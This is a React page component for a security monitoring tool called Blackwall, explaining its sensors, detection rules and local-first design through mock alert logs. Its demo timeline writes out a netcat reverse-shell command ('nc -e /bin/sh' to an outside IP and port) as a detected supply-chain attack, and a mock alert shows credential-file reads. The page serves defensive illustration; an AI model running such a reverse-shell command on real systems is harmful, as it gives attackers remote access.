import React, { useState } from "react";
import { Link } from "react-router-dom";
import { ArrowRight, ChevronDown } from "lucide-react";
import TerminalWindow from "../components/TerminalWindow";
import CopyableCode from "../components/CopyableCode";

const TIMELINE = [
  {
    time: "9:00 AM",
    label: "Clean Start",
    lines: [
      { c: "text-[#71717a]", t: "[Info] Blackwall started" },
      { c: "text-[#71717a]", t: "[Info] 3 sensors active (Process, Network, File)" },
      { c: "text-[#71717a]", t: "[Info] Monitoring 2 projects (Blackwall, Website)" },
    ],
    detail: "Blackwall initializes sensors and loads project configs. No alerts, clean state.",
  },
  {
    time: "9:15 AM",
    label: "Normal AI Usage",
    lines: [
      { c: "text-[#71717a]", t: "[Info] Cursor launched" },
      { c: "text-[#71717a]", t: "[Info] Cursor → api.cursor.sh (whitelisted)" },
      { c: "text-[#71717a]", t: "[Info] main.rs modified (+23 -5)" },
      { c: "text-[#52525b]", t: "       Not AI-correlated (user typing)" },
    ],
    detail: "Cursor connects to its expected endpoints. File changes are not flagged as AI-correlated because no suspicious network activity preceded them.",
  },
  {
    time: "10:00 AM",
    label: "Dependency Update",
    lines: [
      { c: "text-[#71717a]", t: "[Info]   npm install initiated" },
      { c: "text-[#71717a]", t: "[Info]   npm → registry.npmjs.org (expected)" },
      { c: "text-[#eab308]", t: "[Medium] package-lock.json modified" },
      { c: "text-[#52525b]", t: "         Risk: DEPENDENCY_CHANGE" },
    ],
    detail: "npm install runs and modifies the lockfile. Flagged as DEPENDENCY_CHANGE (Medium) for review, but no attack indicators present.",
  },
  {
    time: "10:30 AM",
    label: "The Attack",
    lines: [
      { c: "text-[#ef4444]", t: "[Critical] Supply Chain Attack" },
      { c: "text-[#52525b]", t: "           npm spawned /usr/bin/nc -e /bin/sh 45.33.32.156:4444" },
      { c: "text-[#52525b]", t: "" },
      { c: "text-[#71717a]", t: "What: npm install → netcat reverse shell" },
      { c: "text-[#71717a]", t: "Why:  Malicious post-install script in dependency" },
      { c: "text-[#71717a]", t: "Risk: Attacker gains remote shell access" },
    ],
    detail: "A malicious package in the dependency tree runs a post-install script that spawns netcat with reverse shell flags. Blackwall catches it immediately.",
  },
  {
    time: "10:31 AM",
    label: "User Action",
    lines: [,
      { c: "text-[#10b981]", t: "[Info] Event starred for incident report" },
      { c: "text-[#71717a]", t: "[Info] Audit log entry created" },
    ],
    detail: "'*' to star the event for follow-up. An audit trail is automatically created.",
  },
  {
    time: "11:00 AM",
    label: "Code Change Review",
    lines: [
      { c: "text-[#eab308]", t: "[Medium] CI Workflow Modified" },
      { c: "text-[#52525b]", t: "         .github/workflows/ci.yml (+12 -0)" },
      { c: "text-[#71717a]", t: "[Info]   Commit: 'Add release workflow'" },
      { c: "text-[#52525b]", t: "         Not AI-correlated (normal pattern)" },
    ],
    detail: "A CI workflow is modified. Flagged as medium risk. The commit is not AI-correlated because the change was made manually, 5 minutes before the commit — a normal pattern for this developer.",
  },
];

const THREE_STREAMS = [
  {
    title: "System Events",
    color: "text-[#f59e0b]",
    border: "border-[#f59e0b]/20",
    items: [
      "Every process that launches (who started it, what's the parent)",
      "Every network connection (where it's going, what port)",
      "Every file that changes (what process touched it, when)",
    ],
  },
  {
    title: "Detection Rules",
    color: "text-[#8b5cf6]",
    border: "border-[#8b5cf6]/20",
    items: [
      "Is this process suspicious?",
      "Is this network destination on the blocklist?",
      "Does this file path match credential patterns?",
      "Is this a known attack signature?",
    ],
  },
  {
    title: "Context & Correlation",
    color: "text-[#06b6d4]",
    border: "border-[#06b6d4]/20",
    items: [
      "Was this code change near AI activity?",
      "Did this file modification happen right before a commit?",
      "Is this network connection to a new destination?",
    ],
  },
];

const ARCH_STEPS = [
  { label: "OS Events", next: true },
  { label: "Sensors", next: true },
  { label: "Detection Engine", next: true },
  { label: "Encrypted Storage", next: false },
  { label: "TUI Display", next: true, down: true },
  { label: "User Actions", next: true },
  { label: "Audit Log", next: false },
];

const ARCH_PRINCIPLES = [
  {
    title: "Zero Network Dependency",
    body: "Blackwall runs entirely on your machine. No cloud API. No phoning home. No telemetry unless you explicitly enable webhook forwarding.",
  },
  {
    title: "Encrypted At Rest",
    body: "All event logs are AES-256-GCM encrypted. Key derived from your machine ID. Can't be read without your system.",
  },
  {
    title: "Minimal Privileges",
    body: "Sensors run with the minimum OS permissions needed. Process sensor: read-only. File sensor: inotify only. Network sensor: lsof polling.",
  },
  {
    title: "Signed & Verified",
    body: "Every release is GPG-signed. Installer verifies checksum and signature before running. No trust-on-download.",
  },
];

const INSTALL_STEPS = [
  {
    n: "01",
    title: "Install",
    time: "~10 seconds",
    code: "curl -fsSL https://blackwall.dev/install.sh | bash",
    desc: "The installer verifies the GPG signature and checksum before running. No trust-on-download.",
  },
  {
    n: "02",
    title: "First Run",
    time: "~20 seconds",
    code: "blackwall",
    desc: "The first-run wizard appears. Choose which folders to monitor. That's it.",
  },
  {
    n: "03",
    title: "Configure Projects",
    time: "~30 seconds",
    code: `# ~/.blackwall/config.toml
[projects]
roots = [
  { name = "MyApp", path = "/Users/you/myapp", git = true }
]`,
    desc: "Edit the TOML config to add your projects. Git-aware monitoring enables automatically.",
    multiline: true,
  },
];

export default function HowItWorksPage() {
  const [activeTime, setActiveTime] = useState(3);
  const [openFaq, setOpenFaq] = useState(null);

  const FAQS = [
    { q: "How do I get started with Blackwall?", a: "Run `curl -fsSL https://blackwall.dev/install.sh | bash` and then `blackwall` to launch the first-run wizard. You'll be monitoring within 60 seconds." },
    { q: "What does Blackwall actually monitor?", a: "Blackwall monitors three streams: System events (processes, network, files), AI tool activity (Cursor, Copilot, Windsurf, etc.), and Project changes (git-aware code tracking). All locally, no cloud." },
    { q: "Does Blackwall send any data to the cloud?", a: "Zero telemetry by default. All data is stored locally, encrypted with AES-256-GCM. Webhook forwarding to external services is available but opt-in only." },
    { q: "Will Blackwall slow down my machine?", a: "Blackwall is designed to be extremely lightweight. The sensors use OS-native APIs (inotify, lsof) with minimal polling overhead. In testing, CPU impact is <0.5% on modern hardware." },
    { q: "Can I run Blackwall in CI/CD?", a: "Yes. Blackwall has a non-interactive mode for CI use. Output can be exported as JSON or sent to a webhook endpoint for SIEM integration." },
  ];

  return (
    <div className="min-h-screen bg-[#0a0a0a] pt-14">

      {/* ── Page Header ───────────────────────────── */}
      <section className="max-w-6xl mx-auto px-6 pt-24 pb-16">
        <p className="text-xs font-mono text-[#3f3f46] mb-4">/blackwall/how-it-works</p>
        <h1 className="text-4xl md:text-5xl font-medium tracking-tight text-[#ededed] mb-4">
          From Zero to Monitoring<br />in 60 Seconds.
        </h1>
        <p className="text-base text-[#71717a] max-w-xl leading-relaxed">
          Understand how Blackwall works under the hood — from OS events to actionable alerts, with zero cloud dependencies.
        </p>
      </section>

      {/* ── The Problem Story ─────────────────────── */}
      <section className="border-t border-[#1a1a1a]">
        <div className="max-w-6xl mx-auto px-6 py-20">
          <p className="text-xs font-mono text-[#3f3f46] mb-6">/blackwall/how-it-works/the-problem</p>
          <h2 className="text-2xl md:text-3xl font-medium tracking-tight text-[#ededed] mb-6">
            The Day Cursor Read Your AWS Keys
          </h2>
          <p className="text-sm text-[#71717a] leading-relaxed max-w-2xl mb-10">
            You're building a feature. Cursor suggests code. You accept. The tests pass. You commit. You deploy. Three hours later, your AWS bill shows $4,200 in cryptocurrency mining charges. What happened? When did it happen? How do you prove it wasn't your code?
          </p>

          <div className="grid grid-cols-1 md:grid-cols-2 gap-4">
            {/* Without */}
            <div className="rounded-lg border border-[#1a1a1a] bg-[#0d0d0d] p-5">
              <p className="text-xs font-mono text-[#52525b] mb-4">Without Blackwall</p>
              <TerminalWindow title="git log">
                <div className="text-xs font-mono space-y-1">
                  <div className="text-[#71717a]">commit abc123: 'Add deployment script'</div>
                  <div className="text-[#71717a]">commit def456: 'Update dependencies'</div>
                  <div className="text-[#52525b] mt-3">No visibility into what happened.</div>
                  <div className="text-[#52525b]">No evidence. No timeline. No proof.</div>
                </div>
              </TerminalWindow>
            </div>
            {/* With */}
            <div className="rounded-lg border border-[#f59e0b]/20 bg-[#0d0d0d] p-5">
              <p className="text-xs font-mono text-[#f59e0b] mb-4">● With Blackwall</p>
              <TerminalWindow title="blackwall — events">
                <div className="text-xs font-mono space-y-1">
                  <div className="text-[#f97316]">10:41  [High]     Cursor → ~/.aws/credentials</div>
                  <div className="text-[#f97316]">10:42  [High]     Cursor → 45.33.32.156</div>
                  <div className="text-[#eab308]">10:43  [Medium]   deploy.sh modified (+47 lines)</div>
                  <div className="text-[#52525b]">                  AI-correlated: 30s after Cursor</div>
                  <div className="text-[#ef4444] mt-2">10:44  [Critical] Supply Chain Attack</div>
                </div>
              </TerminalWindow>
            </div>
          </div>
          <p className="text-sm text-[#71717a] mt-6">
            With Blackwall, you have the exact timeline, the evidence, and the proof. Without it, you have nothing but a $4,200 bill.
          </p>
        </div>
      </section>

      {/* ── Three Streams ─────────────────────────── */}
      <section className="border-t border-[#1a1a1a]">
        <div className="max-w-6xl mx-auto px-6 py-20">
          <p className="text-xs font-mono text-[#3f3f46] mb-6">/blackwall/how-it-works/architecture</p>
          <h2 className="text-2xl md:text-3xl font-medium tracking-tight text-[#ededed] mb-2">
            Three Streams, One Dashboard
          </h2>
          <p className="text-sm text-[#71717a] mb-10">
            Every alert is the intersection of system events, detection rules, and correlation context.
          </p>
          <div className="grid grid-cols-1 md:grid-cols-3 gap-4">
            {THREE_STREAMS.map((s, i) => (
              <div key={i} data-testid={`stream-card-${i}`} className={`p-6 rounded-lg border ${s.border} bg-[#0d0d0d]`}>
                <p className={`text-xs font-mono ${s.color} mb-4`}>● {s.title}</p>
                <ul className="space-y-2.5">
                  {s.items.map((item, j) => (
                    <li key={j} className="flex gap-2.5 text-xs text-[#71717a]">
                      <span className="text-[#3f3f46] mt-0.5">—</span>
                      {item}
                    </li>
                  ))}
                </ul>
              </div>
            ))}
          </div>
          <div className="mt-8 p-4 rounded-lg border border-[#262626] bg-[#111111] text-center">
            <p className="text-xs font-mono text-[#f59e0b]">● Overlap: Actionable Alerts</p>
            <p className="text-sm text-[#71717a] mt-1">Only show you what matters. Suppress the noise. Explain the risk.</p>
          </div>
        </div>
      </section>

      {/* ── Architecture ──────────────────────────── */}
      <section className="border-t border-[#1a1a1a]">
        <div className="max-w-6xl mx-auto px-6 py-20">
          <p className="text-xs font-mono text-[#3f3f46] mb-6">/blackwall/how-it-works/local-first</p>
          <h2 className="text-2xl md:text-3xl font-medium tracking-tight text-[#ededed] mb-2">Local-First, Always</h2>
          <p className="text-sm text-[#71717a] mb-10">Data flow from OS event to encrypted storage, all on your machine.</p>

          {/* Arch diagram */}
          <div className="bg-[#050505] border border-[#1a1a1a] rounded-lg p-6 font-mono text-xs mb-10 overflow-x-auto">
            <div className="flex items-center gap-3 text-[#71717a] flex-wrap">
              {["[OS Events]", "→", "[Sensors]", "→", "[Detection Engine]", "→", "[Encrypted Storage]"].map((t, i) => (
                <span key={i} className={t === "→" ? "text-[#3f3f46]" : "border border-[#262626] px-2 py-1 rounded text-[#a1a1aa]"}>{t}</span>
              ))}
            </div>
            <div className="ml-[calc(50%-20px)] text-[#3f3f46] mt-1">↓</div>
            <div className="flex items-center gap-3 text-[#71717a] flex-wrap mt-1">
              {["[TUI Display]", "→", "[User Actions]", "→", "[Audit Log]"].map((t, i) => (
                <span key={i} className={t === "→" ? "text-[#3f3f46]" : "border border-[#262626] px-2 py-1 rounded text-[#a1a1aa]"}>{t}</span>
              ))}
            </div>
          </div>

          <div className="grid grid-cols-1 md:grid-cols-2 gap-4">
            {ARCH_PRINCIPLES.map((p, i) => (
              <div key={i} data-testid={`arch-principle-${i}`} className="p-5 rounded-lg border border-[#1a1a1a] bg-[#0d0d0d]">
                <p className="text-sm font-medium text-[#ededed] mb-2">{p.title}</p>
                <p className="text-xs text-[#71717a] leading-relaxed">{p.body}</p>
              </div>
            ))}
          </div>
        </div>
      </section>

      {/* ── LLM Security Scanner ──────────────────── */}
      <section className="border-t border-[#1a1a1a]">
        <div className="max-w-6xl mx-auto px-6 py-20">
          <p className="text-xs font-mono text-[#3f3f46] mb-6">/blackwall/how-it-works/llm-scanner</p>
          <h2 className="text-2xl md:text-3xl font-medium tracking-tight text-[#ededed] mb-2">
            Because Your Code Calls LLMs Too
          </h2>
          <p className="text-sm text-[#71717a] mb-10 max-w-lg">
            The LLM security scanner analyzes your codebase for 12 categories of vulnerabilities specific to code that interacts with language models.
          </p>

          <div className="grid grid-cols-1 lg:grid-cols-2 gap-8">
            <TerminalWindow title="blackwall llm-scan app.py">
              <div className="text-xs font-mono space-y-1.5">
                <div className="text-[#52525b]"># Your code</div>
                <div className="text-[#71717a]">prompt = f"Summarize: <span className="text-[#f97316]">{"{user_input}"}</span>"</div>
                <div className="text-[#71717a]">result = llm.complete(prompt)</div>
                <div className="text-[#71717a]">execute_tool(result['tool_call'])</div>
                <div className="h-2" />
                <div className="text-[#52525b]"># What Blackwall sees</div>
                <div className="text-[#f97316]">[High] Prompt template injection — app.py:42</div>
                <div className="text-[#52525b]">       Unsanitized user_input in f-string</div>
                <div className="text-[#f97316]">[High] Blind tool execution — app.py:44</div>
                <div className="text-[#52525b]">       No authorization check on tool call</div>
                <div className="text-[#eab308]">[Medium] Schema validation missing — app.py:43</div>
                <div className="text-[#52525b]">         No output format enforcement</div>
              </div>
            </TerminalWindow>
            <div className="space-y-3">
              {[
                { mode: "Strict", flag: "blackwall llm-scan --strict ./src", color: "text-[#10b981]", desc: "High-confidence only. Low noise. Recommended for large codebases." },
                { mode: "Balanced (default)", flag: "blackwall llm-scan ./src", color: "text-[#f59e0b]", desc: "Medium confidence. Recommended for most projects." },
                { mode: "Quiet", flag: "blackwall llm-scan --quiet ./src", color: "text-[#71717a]", desc: "Critical findings only. For legacy codebases." },
              ].map((m, i) => (
                <div key={i} className="p-4 rounded-lg border border-[#1a1a1a] bg-[#0d0d0d]">
                  <p className={`text-xs font-medium mb-2 ${m.color}`}>{m.mode}</p>
                  <code className="text-xs font-mono text-[#52525b] block mb-1.5">{m.flag}</code>
                  <p className="text-xs text-[#71717a]">{m.desc}</p>
                </div>
              ))}
            </div>
          </div>
        </div>
      </section>

      {/* ── Day in the Life Timeline ──────────────── */}
      <section className="border-t border-[#1a1a1a]">
        <div className="max-w-6xl mx-auto px-6 py-20">
          <p className="text-xs font-mono text-[#3f3f46] mb-6">/blackwall/how-it-works/timeline</p>
          <h2 className="text-2xl md:text-3xl font-medium tracking-tight text-[#ededed] mb-2">
            A Day in the Life of Blackwall
          </h2>
          <p className="text-sm text-[#71717a] mb-10">Click each event to see what Blackwall detected and why it matters.</p>

          <div className="grid grid-cols-1 lg:grid-cols-[240px_1fr] gap-8">
            {/* Timeline nav */}
            <div className="space-y-1">
              {TIMELINE.map((event, i) => (
                <button
                  key={i}
                  data-testid={`timeline-event-${i}`}
                  onClick={() => setActiveTime(i)}
                  className={`w-full flex items-center gap-3 px-3 py-2.5 rounded-md text-left transition-colors ${
                    activeTime === i ? "bg-[#1a1a1a] text-[#ededed]" : "text-[#52525b] hover:text-[#71717a]"
                  }`}
                >
                  <span className={`text-xs font-mono shrink-0 ${activeTime === i ? "text-[#f59e0b]" : "text-[#3f3f46]"}`}>
                    {event.time}
                  </span>
                  <span className="text-xs">{event.label}</span>
                </button>
              ))}
            </div>

            {/* Timeline detail */}
            <div key={activeTime} className="animate-fade-in space-y-4">
              <TerminalWindow title={`blackwall — ${TIMELINE[activeTime].time}`}>
                {TIMELINE[activeTime].lines.map((l, i) =>
                  l.t === "" ? (
                    <div key={i} className="h-2" />
                  ) : (
                    <div key={i} className={`text-xs font-mono ${l.c} leading-6`}>{l.t}</div>
                  )
                )}
              </TerminalWindow>
              <p className="text-sm text-[#71717a] leading-relaxed">{TIMELINE[activeTime].detail}</p>
            </div>
          </div>
        </div>
      </section>

      {/* ── Install Steps ──────────────────────────── */}
      <section id="install" className="border-t border-[#1a1a1a]">
        <div className="max-w-6xl mx-auto px-6 py-20">
          <p className="text-xs font-mono text-[#3f3f46] mb-6">/blackwall/how-it-works/install</p>
          <h2 className="text-2xl md:text-3xl font-medium tracking-tight text-[#ededed] mb-2">
            Installation &amp; Setup
          </h2>
          <p className="text-sm text-[#71717a] mb-10">From zero to monitoring in 60 seconds.</p>

          <div className="space-y-6">
            {INSTALL_STEPS.map((step, i) => (
              <div key={i} data-testid={`install-step-${i}`} className="grid grid-cols-1 md:grid-cols-[80px_1fr] gap-4 items-start">
                <div className="text-center md:text-left">
                  <span className="text-3xl font-mono font-medium text-[#1a1a1a]">{step.n}</span>
                </div>
                <div className="p-5 rounded-lg border border-[#1a1a1a] bg-[#0d0d0d]">
                  <div className="flex items-center gap-3 mb-3">
                    <h3 className="text-sm font-medium text-[#ededed]">{step.title}</h3>
                    <span className="text-xs font-mono text-[#52525b]">({step.time})</span>
                  </div>
                  {step.multiline ? (
                    <TerminalWindow title="config.toml" className="mb-3">
                      <pre className="text-xs font-mono text-[#71717a] whitespace-pre">{step.code}</pre>
                    </TerminalWindow>
                  ) : (
                    <CopyableCode code={step.code} className="mb-3" />
                  )}
                  <p className="text-xs text-[#71717a] leading-relaxed">{step.desc}</p>
                </div>
              </div>
            ))}
          </div>
        </div>
      </section>

      {/* ── FAQ ─────────────────────────────────────── */}
      <section className="border-t border-[#1a1a1a]">
        <div className="max-w-6xl mx-auto px-6 py-20">
          <p className="text-xs font-mono text-[#3f3f46] mb-6">/blackwall/how-it-works/faq</p>
          <h2 className="text-2xl md:text-3xl font-medium tracking-tight text-[#ededed] mb-8">FAQ</h2>
          <div className="max-w-2xl space-y-2">
            {FAQS.map((faq, i) => (
              <div key={i} data-testid={`faq-${i}`} className="border border-[#1a1a1a] rounded-lg overflow-hidden">
                <button
                  onClick={() => setOpenFaq(openFaq === i ? null : i)}
                  className="w-full flex items-center justify-between px-5 py-4 hover:bg-[#0d0d0d] transition-colors text-left"
                >
                  <span className="text-sm text-[#ededed]">{faq.q}</span>
                  <ChevronDown
                    size={14}
                    strokeWidth={1.5}
                    className={`text-[#52525b] shrink-0 ml-4 transition-transform ${openFaq === i ? "rotate-180" : ""}`}
                  />
                </button>
                {openFaq === i && (
                  <div className="border-t border-[#1a1a1a] px-5 py-4 animate-fade-in">
                    <p className="text-sm text-[#71717a] leading-relaxed">{faq.a}</p>
                  </div>
                )}
              </div>
            ))}
          </div>
        </div>
      </section>

      {/* ── Final CTA ─────────────────────────────── */}
      <section className="border-t border-[#1a1a1a]">
        <div className="max-w-6xl mx-auto px-6 py-16 text-center">
          <h2 className="text-2xl md:text-3xl font-medium text-[#ededed] mb-3">
            Start Monitoring. Stay Informed.
          </h2>
          <p className="text-sm text-[#71717a] mb-8">Install for macOS or Linux. No config, no cloud, no compromise.</p>
          <div className="flex flex-col sm:flex-row items-center justify-center gap-3">
            <a
              href="#install"
              data-testid="hiw-cta-macos"
              className="px-5 py-2.5 text-sm bg-[#ededed] text-[#0a0a0a] font-medium rounded-full hover:bg-white transition-colors"
            >
              Install for macOS
            </a>
            <a
              href="#install"
              data-testid="hiw-cta-linux"
              className="px-5 py-2.5 text-sm border border-[#262626] text-[#ededed] rounded-full hover:border-[#3f3f46] transition-colors"
            >
              Install for Linux
            </a>
            <a
              href="#"
              data-testid="hiw-cta-docs"
              className="flex items-center gap-1.5 text-sm text-[#71717a] hover:text-[#ededed] transition-colors"
            >
              Read the Full Docs <ArrowRight size={14} strokeWidth={1.5} />
            </a>
          </div>
        </div>
      </section>
    </div>
  );
}
